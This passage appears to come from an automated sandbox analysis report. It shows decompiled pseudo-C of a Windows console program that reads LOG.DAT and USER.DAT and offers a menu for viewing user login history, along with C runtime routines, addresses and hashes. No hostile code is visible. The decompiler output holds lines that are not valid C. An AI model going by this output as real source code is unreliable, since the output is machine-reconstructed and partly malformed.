                                                									_t52 = _t45 | 0xffffffff;
                                                								} else {
                                                									_t85 = _t74 & 0xfffffffe;
                                                									__eflags = _t85;
                                                									 *_t92 = _t92[2];
                                                									_t92[3] = _t85;
                                                									goto L10;
                                                								}
                                                							}
                                                						} else {
                                                							_t67 = E01238EFF(__eflags);
                                                							 *_t67 = 0x22;
                                                							goto L6;
                                                						}
                                                					} else {
                                                						_t67 = E01238EFF(__eflags);
                                                						 *_t67 = 9;
                                                						L6:
                                                						_t92[3] = _t92[3] | 0x00000020;
                                                						_t52 = _t67 | 0xffffffff;
                                                					}
                                                					return _t52;
                                                				} else {
                                                					return _t44 | 0xffffffff;
                                                				}
                                                			}


























                                                0x0123bb70
                                                0x0123bb77
                                                0x0123bb7f
                                                0x0123bb84
                                                0x0123bb8a
                                                0x0123bb8d
                                                0x0123bb8f
                                                0x0123bb92
                                                0x0123bba1
                                                0x0123bba4
                                                0x0123bbbe
                                                0x0123bbc0
                                                0x0123bbc3
                                                0x0123bbd8
                                                0x0123bbde
                                                0x0123bbe1
                                                0x0123bbe4
                                                0x0123bbe7
                                                0x0123bbec
                                                0x0123bbee
                                                0x0123bbf6
                                                0x0123bbf8
                                                0x0123bc06
                                                0x0123bc07
                                                0x0123bc0d
                                                0x0123bc0f
                                                0x00000000
                                                0x00000000
                                                0x0123bbfa
                                                0x0123bbfa
                                                0x0123bc02
                                                0x0123bc04
                                                0x0123bc11
                                                0x0123bc12
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0123bc04
                                                0x0123bbf8
                                                0x0123bc18
                                                0x0123bc1f
                                                0x0123bc9d
                                                0x0123bc9e
                                                0x0123bc9f
                                                0x0123bca5
                                                0x0123bca6
                                                0x0123bca7
                                                0x0123bcaf
                                                0x00000000
                                                0x0123bc21
                                                0x0123bc21
                                                0x0123bc26
                                                0x0123bc29
                                                0x0123bc2e
                                                0x0123bc31
                                                0x0123bc34
                                                0x0123bc37
                                                0x0123bc39
                                                0x0123bc52
                                                0x0123bc55
                                                0x0123bc72
                                                0x0123bc72
                                                0x0123bc57
                                                0x0123bc57
                                                0x0123bc5a
                                                0x00000000
                                                0x0123bc5c
                                                0x0123bc69
                                                0x0123bc69
                                                0x0123bc5a
                                                0x0123bc77
                                                0x0123bc7b
                                                0x00000000
                                                0x0123bc7d
                                                0x0123bc7d
                                                0x0123bc7f
                                                0x0123bc80
                                                0x0123bc81
                                                0x0123bc87
                                                0x0123bc8c
                                                0x0123bc8f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0123bc8f
                                                0x0123bc3b
                                                0x0123bc3b
                                                0x0123bc3c
                                                0x0123bc3d
                                                0x0123bc46
                                                0x0123bc91
                                                0x0123bc94
                                                0x0123bc97
                                                0x0123bcb1
                                                0x0123bcb1
                                                0x0123bcb4
                                                0x0123bcbf
                                                0x0123bcb6
                                                0x0123bcb6
                                                0x0123bcb6
                                                0x0123bcb6
                                                0x0123bcb6
                                                0x00000000
                                                0x0123bcb6
                                                0x0123bcb4
                                                0x0123bc39
                                                0x0123bbc5
                                                0x0123bbc5
                                                0x0123bbc8
                                                0x0123bbcb
                                                0x0123bc4d
                                                0x0123bcba
                                                0x0123bcba
                                                0x0123bbcd
                                                0x0123bbd0
                                                0x0123bbd0
                                                0x0123bbd3
                                                0x0123bbd5
                                                0x00000000
                                                0x0123bbd5
                                                0x0123bbcb
                                                0x0123bba6
                                                0x0123bba6
                                                0x0123bbab
                                                0x00000000
                                                0x0123bbab
                                                0x0123bb94
                                                0x0123bb94
                                                0x0123bb99
                                                0x0123bbb1
                                                0x0123bbb1
                                                0x0123bbb5
                                                0x0123bbb5
                                                0x0123bcc7
                                                0x0123bb79
                                                0x0123bb7d
                                                0x0123bb7d

                                                APIs
                                                • __ioinit.LIBCMT ref: 0123BB70
                                                  • Part of subcall function 0123A5A7: InitOnceExecuteOnce.KERNEL32(0125229C,0123A5E2,00000000,00000000,01241205,?,?,01239886,00000000,?,?,?,012371AD,-00000020,0124D7B8,0000000C), ref: 0123A5B5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Once$ExecuteInit__ioinit
                                                • String ID:
                                                • API String ID: 129814473-0
                                                • Opcode ID: a3723833a784d0035029f83ddb1f748b61901b88de0fd0e471294b3ec6791ab2
                                                • Instruction ID: 5002ab42a2ee48422dd7b6de1c71efbd61ffdde899e9908cdbb34c2abc2d7ea0
                                                • Opcode Fuzzy Hash: a3723833a784d0035029f83ddb1f748b61901b88de0fd0e471294b3ec6791ab2
                                                • Instruction Fuzzy Hash: E141F5F16307029FE7399F2CC891A7A7BA49FD5320B048B1DE6A6876D1EB74D4408B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E01241D26(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                				void* _t7;
                                                				long _t8;
                                                				intOrPtr* _t9;
                                                				intOrPtr* _t12;
                                                				long _t20;
                                                				long _t31;
                                                
                                                				if(_a4 != 0) {
                                                					_t31 = _a8;
                                                					__eflags = _t31;
                                                					if(_t31 != 0) {
                                                						_push(__ebx);
                                                						while(1) {
                                                							__eflags = _t31 - 0xffffffe0;
                                                							if(_t31 > 0xffffffe0) {
                                                								break;
                                                							}
                                                							__eflags = _t31;
                                                							if(_t31 == 0) {
                                                								_t31 = _t31 + 1;
                                                								__eflags = _t31;
                                                							}
                                                							_t7 = HeapReAlloc( *0x1252a68, 0, _a4, _t31);
                                                							_t20 = _t7;
                                                							__eflags = _t20;
                                                							if(_t20 != 0) {
                                                								L17:
                                                								_t8 = _t20;
                                                							} else {
                                                								__eflags =  *0x1252a64 - _t7;
                                                								if(__eflags == 0) {
                                                									_t9 = E01238EFF(__eflags);
                                                									 *_t9 = E01238F12(GetLastError());
                                                									goto L17;
                                                								} else {
                                                									__eflags = E0123C6EE(_t7, _t31);
                                                									if(__eflags == 0) {
                                                										_t12 = E01238EFF(__eflags);
                                                										 *_t12 = E01238F12(GetLastError());
                                                										L12:
                                                										_t8 = 0;
                                                										__eflags = 0;
                                                									} else {
                                                										continue;
                                                									}
                                                								}
                                                							}
                                                							goto L14;
                                                						}
                                                						E0123C6EE(_t6, _t31);
                                                						 *((intOrPtr*)(E01238EFF(__eflags))) = 0xc;
                                                						goto L12;
                                                					} else {
                                                						E01238F53(_a4);
                                                						_t8 = 0;
                                                					}
                                                					L14:
                                                					return _t8;
                                                				} else {
                                                					return E012377C5(__ebx, __edx, __edi, _a8);
                                                				}
                                                			}









                                                0x01241d2d
                                                0x01241d3b
                                                0x01241d3e
                                                0x01241d40
                                                0x01241d4f
                                                0x01241d82
                                                0x01241d82
                                                0x01241d85
                                                0x00000000
                                                0x00000000
                                                0x01241d52
                                                0x01241d54
                                                0x01241d56
                                                0x01241d56
                                                0x01241d56
                                                0x01241d63
                                                0x01241d69
                                                0x01241d6b
                                                0x01241d6d
                                                0x01241dcd
                                                0x01241dcd
                                                0x01241d6f
                                                0x01241d6f
                                                0x01241d75
                                                0x01241db7
                                                0x01241dcb
                                                0x00000000
                                                0x01241d77
                                                0x01241d7e
                                                0x01241d80
                                                0x01241d9f
                                                0x01241db3
                                                0x01241d99
                                                0x01241d99
                                                0x01241d99
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01241d80
                                                0x01241d75
                                                0x00000000
                                                0x01241d9b
                                                0x01241d88
                                                0x01241d93
                                                0x00000000
                                                0x01241d42
                                                0x01241d45
                                                0x01241d4b
                                                0x01241d4b
                                                0x01241d9c
                                                0x01241d9e
                                                0x01241d2f
                                                0x01241d39
                                                0x01241d39

                                                APIs
                                                • _malloc.LIBCMT ref: 01241D32
                                                  • Part of subcall function 012377C5: __FF_MSGBANNER.LIBCMT ref: 012377DC
                                                  • Part of subcall function 012377C5: __NMSG_WRITE.LIBCMT ref: 012377E3
                                                  • Part of subcall function 012377C5: HeapAlloc.KERNEL32(00A50000,00000000,00000001,00000000,00000000,00000000,?,0123C5BB,00000000,00000000,00000000,00000000,?,0123BF28,00000018,0124D900), ref: 01237808
                                                • _free.LIBCMT ref: 01241D45
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AllocHeap_free_malloc
                                                • String ID:
                                                • API String ID: 2734353464-0
                                                • Opcode ID: ccd8d4a5751def43bb8f633174a4947b5e6fe562f416e8501ce2be29bf67c11a
                                                • Instruction ID: b533630e41595dafc76d5075909c6c6ece6ac824fed1725904b7007a5323c064
                                                • Opcode Fuzzy Hash: ccd8d4a5751def43bb8f633174a4947b5e6fe562f416e8501ce2be29bf67c11a
                                                • Instruction Fuzzy Hash: 9C11C6F2534313EFDB393FB8A8046793B999F50260F104525FA89DA194DF34E4E09794
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 0123860D
                                                  • Part of subcall function 0123E840: __87except.LIBCMT ref: 0123E87B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ErrorHandling__87except__start
                                                • String ID: pow
                                                • API String ID: 2905807303-2276729525
                                                • Opcode ID: 94d0458ce56f14d9088ef7cda2fbcca6fd90b181e8a223b371e88f0592ba9811
                                                • Instruction ID: 619fe3fc2942727e06a91cd8c2fe1a6dcd52868b57d6946b70352e4a71a8e7f7
                                                • Opcode Fuzzy Hash: 94d0458ce56f14d9088ef7cda2fbcca6fd90b181e8a223b371e88f0592ba9811
                                                • Instruction Fuzzy Hash: 53516BE0A39203CADB127B1CD94137E2F94EBC0710F118E69F2D54A2EDEB75C4989B46
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E0123347B(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				intOrPtr _t218;
                                                				void* _t228;
                                                				void* _t249;
                                                				void* _t270;
                                                				void* _t283;
                                                				void* _t287;
                                                				void* _t306;
                                                				intOrPtr _t307;
                                                				void* _t309;
                                                				intOrPtr _t310;
                                                				void* _t313;
                                                				void* _t314;
                                                				intOrPtr _t320;
                                                				void* _t336;
                                                				intOrPtr _t364;
                                                				void* _t371;
                                                				intOrPtr _t394;
                                                				void* _t397;
                                                				void* _t421;
                                                				void* _t433;
                                                				void* _t435;
                                                				void* _t436;
                                                				void* _t437;
                                                				void* _t442;
                                                				void* _t443;
                                                				void* _t446;
                                                				void* _t448;
                                                				void* _t450;
                                                				void* _t451;
                                                				void* _t457;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					_t457 = __fp0;
                                                					_t421 = __esi;
                                                					_t397 = __edi;
                                                					_t314 = __ebx;
                                                					 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                					 *(_t433 - 0xc) = 1 +  *(_t433 - 0xc);
                                                					while(1) {
                                                						L69:
                                                						__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                						if(__eflags < 0) {
                                                						}
                                                						L70:
                                                						E012312B0(5,  *(_t433 - 0xc) + 0xa);
                                                						_push(1 +  *(_t433 - 8));
                                                						_push("%d.");
                                                						E0123715C(_t314, _t397, _t421, __eflags);
                                                						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x36)) = 0;
                                                						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x40)) = 0;
                                                						_t181 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
                                                						_t270 = E012382C0( *((intOrPtr*)(_t433 - 0x10)) + _t181);
                                                						_t448 = _t435 + 0xc;
                                                						__eflags = _t270 - 0xa;
                                                						if(__eflags < 0) {
                                                							_t336 =  *(_t433 - 8) * 0x45;
                                                							__eflags = _t336;
                                                							_t185 = _t336 + 0x22; // 0x23
                                                							_push( *((intOrPtr*)(_t433 - 0x10)) + _t185);
                                                							E012316A0(_t397, _t421, _t457);
                                                						}
                                                						L72:
                                                						E012312B0(9,  *(_t433 - 0xc) + 0xa);
                                                						_t190 = 0x3b +  *(_t433 - 8) * 0x45; // 0x3c
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t190);
                                                						_t194 = 0x31 +  *(_t433 - 8) * 0x45; // 0x32
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t194);
                                                						_t198 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t198);
                                                						_t202 = 4 +  *(_t433 - 8) * 0x45; // 0x5
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t202);
                                                						_push("%s\t\t%s\t%s\t\t%s");
                                                						E0123715C(_t314, _t397, _t421, __eflags);
                                                						_t435 = _t448 + 0x14;
                                                						__eflags =  *(_t433 - 8) -  *(_t433 - 0x1c) + 9;
                                                						if( *(_t433 - 8) <  *(_t433 - 0x1c) + 9) {
                                                							L74:
                                                							goto L0;
                                                						} else {
                                                							L73:
                                                							 *(_t433 - 0x1c) =  *(_t433 - 0x1c) + 0xa;
                                                						}
                                                						L75:
                                                						_t322 =  *((char*)(_t433 - 1));
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x53;
                                                						if( *((char*)(_t433 - 1)) == 0x53) {
                                                							L77:
                                                							 *(_t433 - 0x34) = 1;
                                                						} else {
                                                							L76:
                                                							__eflags =  *((char*)(_t433 - 1)) - 0x73;
                                                							if( *((char*)(_t433 - 1)) == 0x73) {
                                                								goto L77;
                                                							}
                                                						}
                                                						L78:
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x20;
                                                						if( *((char*)(_t433 - 1)) == 0x20) {
                                                							_t322 =  *(_t433 - 8);
                                                							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                							if( *(_t433 - 8) ==  *(_t433 - 0x14)) {
                                                								 *(_t433 - 0x1c) = 0;
                                                							}
                                                						}
                                                						L81:
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x53;
                                                						if(__eflags == 0) {
                                                							L50:
                                                							E012320E0(_t322, _t397, _t421, __eflags, _t457);
                                                							__eflags =  *(_t433 - 0x14) - 0xc;
                                                							if(__eflags >= 0) {
                                                								E012312B0(0xf, 0x15);
                                                								_push("Press SPACE BAR to view more data");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t446 = _t435 + 4;
                                                							} else {
                                                								E012312B0(8, 0x15);
                                                								_push("Press S to toggle Sorting between ascending or descending order.");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t446 = _t435 + 4;
                                                							}
                                                							L53:
                                                							E012312B0(5, 8);
                                                							_push("SN\t User Name\tDate\t\tStart time\tEnd Time");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							_t435 = _t446 + 4;
                                                							E012312B0(4, 9);
                                                							 *(_t433 - 8) = 0;
                                                							while(1) {
                                                								L55:
                                                								__eflags =  *(_t433 - 8) - 0x46;
                                                								if(__eflags >= 0) {
                                                									break;
                                                								}
                                                								L56:
                                                								_push(0xc4);
                                                								_push("%c");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t435 = _t435 + 8;
                                                								L54:
                                                								_t287 = 1 +  *(_t433 - 8);
                                                								__eflags = _t287;
                                                								 *(_t433 - 8) = _t287;
                                                							}
                                                							L57:
                                                							__eflags =  *(_t433 - 0x34);
                                                							if( *(_t433 - 0x34) != 0) {
                                                								L58:
                                                								 *(_t433 - 8) =  *(_t433 - 0x14) - 1;
                                                								while(1) {
                                                									L60:
                                                									__eflags =  *(_t433 - 8);
                                                									if( *(_t433 - 8) < 0) {
                                                										break;
                                                									}
                                                									L61:
                                                									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
                                                									memcpy(( *(_t433 - 0x14) -  *(_t433 - 8) - 1) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
                                                									_t435 = _t435 + 0xc;
                                                									_t397 = _t421 + 0x22;
                                                									asm("movsb");
                                                									L59:
                                                									_t371 =  *(_t433 - 8) - 1;
                                                									__eflags = _t371;
                                                									 *(_t433 - 8) = _t371;
                                                								}
                                                								L62:
                                                								 *(_t433 - 8) = 0;
                                                								while(1) {
                                                									L64:
                                                									__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                									if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
                                                										goto L66;
                                                									}
                                                									L65:
                                                									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
                                                									memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                									_t435 = _t435 + 0xc;
                                                									_t397 = _t421 + 0x22;
                                                									asm("movsb");
                                                									L63:
                                                									_t283 = 1 +  *(_t433 - 8);
                                                									__eflags = _t283;
                                                									 *(_t433 - 8) = _t283;
                                                								}
                                                							}
                                                							L66:
                                                							__eflags =  *(_t433 - 0x1c) -  *(_t433 - 0x14);
                                                							if( *(_t433 - 0x1c) >  *(_t433 - 0x14)) {
                                                								 *(_t433 - 0x1c) = 0;
                                                							}
                                                							L68:
                                                							 *(_t433 - 8) =  *(_t433 - 0x1c);
                                                							 *(_t433 - 0xc) = 0;
                                                							L69:
                                                							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                							if(__eflags < 0) {
                                                							}
                                                							goto L75;
                                                						}
                                                						L82:
                                                						_t249 =  *((char*)(_t433 - 1));
                                                						__eflags = _t249 - 0x73;
                                                						if(__eflags == 0) {
                                                							goto L50;
                                                						}
                                                						L83:
                                                						_t322 =  *((char*)(_t433 - 1));
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x20;
                                                						if(__eflags == 0) {
                                                							goto L50;
                                                						}
                                                						L84:
                                                						while(1) {
                                                							L86:
                                                							__eflags = 1;
                                                							if(1 == 0) {
                                                								break;
                                                							}
                                                							L1:
                                                							 *(_t433 - 8) = 0;
                                                							 *(_t433 - 0x28) = 0;
                                                							 *(_t433 - 0x1c) = 0;
                                                							 *(_t433 - 0x34) = 0;
                                                							_t218 = E01236EF1("LOG.DAT", "r");
                                                							_t436 = _t435 + 8;
                                                							 *0x1252f20 = _t218;
                                                							while(1) {
                                                								L2:
                                                								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x3b +  *(_t433 - 8) * 0x45);
                                                								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x31 +  *(_t433 - 8) * 0x45);
                                                								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x22 +  *(_t433 - 8) * 0x45);
                                                								_t320 =  *0x1252f20; // 0x0
                                                								_t228 = E01237021(_t320, "%s %s %s %s\n",  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)));
                                                								_t437 = _t436 + 0x18;
                                                								if(_t228 == 0xffffffff) {
                                                									break;
                                                								}
                                                								L3:
                                                								_t307 = E01236EF1("USER.DAT", "r");
                                                								_t450 = _t437 + 8;
                                                								 *0x1252f28 = _t307;
                                                								while(1) {
                                                									L4:
                                                									_push(_t433 - 0x78);
                                                									_push(_t433 - 0x58);
                                                									_t394 =  *0x1252f28; // 0x0
                                                									_t309 = E01237021(_t394, "%s %s %s\n", _t433 - 0x38);
                                                									_t451 = _t450 + 0x14;
                                                									if(_t309 == 0xffffffff) {
                                                										break;
                                                									}
                                                									L5:
                                                									_t313 = E01238230( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)), _t433 - 0x38);
                                                									_t450 = _t451 + 8;
                                                									if(_t313 == 0) {
                                                										 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                									}
                                                								}
                                                								L8:
                                                								_t310 =  *0x1252f28; // 0x0
                                                								_push(_t310);
                                                								E01236DB6(_t314, _t397, _t421, __eflags);
                                                								_t436 = _t451 + 4;
                                                							}
                                                							L9:
                                                							 *(_t433 - 0x30) =  *(_t433 - 8);
                                                							_t364 =  *0x1252f20; // 0x0
                                                							_push(_t364);
                                                							E01236DB6(_t314, _t397, _t421, __eflags);
                                                							E012320E0( *(_t433 - 8), _t397, _t421, __eflags, _t457);
                                                							E012312B0(0x1e, 8);
                                                							_push("1. View by USER NAME");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							E012312B0(0x1e, 0xa);
                                                							_push("2. View by DATE");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							E012312B0(0x1e, 0xc);
                                                							_push("3. View ALL User history");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							E012312B0(0x1e, 0xe);
                                                							_push("4. Return to main menu");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							_t442 = _t437 + 0x14;
                                                							E012312B0(1, 0xf);
                                                							 *(_t433 - 8) = 0;
                                                							while(1) {
                                                								L11:
                                                								__eflags =  *(_t433 - 8) - 0x4e;
                                                								if(__eflags >= 0) {
                                                									break;
                                                								}
                                                								L12:
                                                								_push("_");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t442 = _t442 + 4;
                                                								_t306 = 1 +  *(_t433 - 8);
                                                								__eflags = _t306;
                                                								 *(_t433 - 8) = _t306;
                                                							}
                                                							L13:
                                                							E012312B0(0x17, 0x11);
                                                							_push(" Press a number between the range [1 -4]  ");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							_t443 = _t442 + 4;
                                                							 *(_t433 - 0xc) = 0;
                                                							_t322 =  *(_t433 - 0xc);
                                                							 *((char*)(_t433 - 2)) =  *(_t433 - 0xc);
                                                							E012320E0( *(_t433 - 0xc), _t397, _t421, __eflags, _t457);
                                                							 *(_t433 - 0x20) =  *((char*)(_t433 - 2));
                                                							 *(_t433 - 0x20) =  *(_t433 - 0x20) - 1;
                                                							__eflags =  *(_t433 - 0x20) - 3;
                                                							if(__eflags > 0) {
                                                								L38:
                                                								E012320E0(_t322, _t397, _t421, __eflags, _t457);
                                                								E012312B0(0xa, 0xa);
                                                								_push("Your input is out of range! Enter a choice between 1 to 4!");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								E012312B0(0xf, 0xc);
                                                								_push("Press ENTER to return to main menu...");
                                                								_t249 = E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t435 = _t443 + 8;
                                                								 *(_t433 - 0x28) = 1;
                                                								goto L39;
                                                							} else {
                                                								L14:
                                                								switch( *((intOrPtr*)( *(_t433 - 0x20) * 4 +  &M012335F8))) {
                                                									case 0:
                                                										L15:
                                                										E012312B0(0x1e, 0xa);
                                                										_push("Enter user name : ");
                                                										E0123715C(_t314, _t397, _t421, __eflags);
                                                										_t365 = _t433 - 0x58;
                                                										_t249 = E0123738B(" %s", _t433 - 0x58);
                                                										_t435 = _t443 + 0xc;
                                                										 *(_t433 - 8) = 0;
                                                										while(1) {
                                                											L17:
                                                											__eflags =  *(_t433 - 8) -  *(_t433 - 0x30);
                                                											if( *(_t433 - 8) >=  *(_t433 - 0x30)) {
                                                												break;
                                                											}
                                                											L18:
                                                											_t365 =  *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45;
                                                											_t299 = E01238230( *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45, _t433 - 0x58);
                                                											_t435 = _t435 + 8;
                                                											__eflags = _t299;
                                                											if(_t299 == 0) {
                                                												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18));
                                                												memcpy( *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                												_t435 = _t435 + 0xc;
                                                												_t397 = _t421 + 0x22;
                                                												asm("movsb");
                                                												_t303 = 1 +  *(_t433 - 0xc);
                                                												__eflags = _t303;
                                                												 *(_t433 - 0xc) = _t303;
                                                											}
                                                											_t249 = 1 +  *(_t433 - 8);
                                                											__eflags = _t249;
                                                											 *(_t433 - 8) = _t249;
                                                										}
                                                										L21:
                                                										_t322 =  *(_t433 - 0xc);
                                                										 *(_t433 - 0x14) =  *(_t433 - 0xc);
                                                										goto L39;
                                                									case 1:
                                                										do {
                                                											L22:
                                                											__eax = E012312B0(0x1e, 0xa);
                                                											_push("Enter Date (dd/mm/yyyy) : ");
                                                											__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                											__esp = __esp + 4;
                                                											__edx = __ebp - 0x58;
                                                											E0123738B(" %s", __ebp - 0x58) = __ebp - 0x58;
                                                											__eflags = E01231E60(__eflags, __ebp - 0x58);
                                                											if(__eflags == 0) {
                                                												__eax = E01231500(__edi, __esi, 0x1e, 0xa, 0x46, 0xa);
                                                												_push(0x124f8b0);
                                                												__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                												__esp = __esp + 4;
                                                											}
                                                											__ecx = __ebp - 0x58;
                                                											__eflags = E01231E60(__eflags, __ebp - 0x58);
                                                										} while (__eflags == 0);
                                                										__edx = __ebp - 0x58;
                                                										_push(__ebp - 0x58);
                                                										__eax = E012315D0();
                                                										 *(__ebp - 8) = 0;
                                                										 *(__ebp - 0xc) = 0;
                                                										while(1) {
                                                											L27:
                                                											__ecx =  *(__ebp - 8);
                                                											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
                                                											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
                                                												break;
                                                											}
                                                											L28:
                                                											__edx = __ebp - 0x58;
                                                											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                											__ecx =  *(__ebp - 0x18);
                                                											__edx =  *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45;
                                                											__eax = E01238230( *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45, __ebp - 0x58);
                                                											__eflags = __eax;
                                                											if(__eax == 0) {
                                                												 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                												__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
                                                												__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
                                                												__ecx = 0x11;
                                                												__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
                                                												__edi = __esi + __ecx;
                                                												__edi = __esi + __ecx + __ecx;
                                                												__ecx = 0;
                                                												asm("movsb");
                                                												__eax =  *(__ebp - 0xc);
                                                												__eax = 1 +  *(__ebp - 0xc);
                                                												__eflags = __eax;
                                                												 *(__ebp - 0xc) = __eax;
                                                											}
                                                											__eax =  *(__ebp - 8);
                                                											__eax = 1 +  *(__ebp - 8);
                                                											__eflags = __eax;
                                                											 *(__ebp - 8) = __eax;
                                                										}
                                                										L31:
                                                										__ecx =  *(__ebp - 0xc);
                                                										 *(__ebp - 0x14) = __ecx;
                                                										goto L39;
                                                									case 2:
                                                										L32:
                                                										 *(__ebp - 8) = 0;
                                                										while(1) {
                                                											L34:
                                                											__eax =  *(__ebp - 8);
                                                											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
                                                											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
                                                												break;
                                                											}
                                                											L35:
                                                											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                											__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
                                                											__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
                                                											__ecx = 0x11;
                                                											__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
                                                											__edi = __esi + __ecx;
                                                											__edi = __esi + __ecx + __ecx;
                                                											__ecx = 0;
                                                											asm("movsb");
                                                											__ecx =  *(__ebp - 0xc);
                                                											__ecx = 1 +  *(__ebp - 0xc);
                                                											 *(__ebp - 0xc) = __ecx;
                                                											__edx =  *(__ebp - 8);
                                                											__edx = 1 +  *(__ebp - 8);
                                                											__eflags = __edx;
                                                											 *(__ebp - 8) = __edx;
